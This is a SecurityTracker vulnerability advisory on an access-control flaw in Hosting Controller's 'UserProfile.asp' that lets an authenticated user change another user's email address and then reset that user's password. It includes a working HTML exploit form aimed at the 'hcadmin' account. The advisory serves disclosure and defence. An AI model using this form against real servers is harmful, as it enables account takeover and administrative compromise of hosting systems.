Hosting Controller 'UserProfile.asp' Lets Remote Authenticated Users Modify Other User Profiles
|
|
SecurityTracker Alert ID: 1014062
|
|
SecurityTracker URL: http://securitytracker.com/id?1014062
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Updated: Jan 2 2009
|
Original Entry Date: May 27 2005
|
Impact: Modification of user information, User access via network
|
Exploit Included: Yes
|
Version(s): 6.1 HotFix 2.0 and prior versions
|
Description: Soroush Dalili from GrayHatz Security Group reported a vulnerability in Hosting Controller. A remote authenticated user can change a target user's profile.
The 'UserProfile.asp' script does not properly enforce access controls. A remote authenticated user can change a target user's e-mail
address. Then, the remote authenticated user can invoke the 'forgot password' feature to request that a new password be sent to
the modified e-mail address. This can be exploited to gain administrative privileges.
A demonstration exploit form is provided:
<form
action="http://[URL]/admin//
accounts/UserProfile.asp?action=updateprofile"
method="post">
Username : <input name="UserList" value="hcadmin"
type="text" size="50">
<br>
emailaddress
: <input name="emailaddress"
value="Crkchat@msn.com" type="text" size="50">
<br>
firstname : <input name="firstname" value="Crkchat"
type="text"
size="50">
<br>
<input name="submit" value="submit" type="submit">
</form>
|
Impact: A remote authenticated user can change a target user's profile and then gain access to the target user's account.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.hostingcontroller.com/ (Links to External Site)
|
Cause: Access control error
|
Underlying OS: Windows (NT), Windows (2000), Windows (XP)
|
|
Message History:
None.
|
Source Message Contents
|
|
|
[Original Message Not Available for Viewing]
|
|
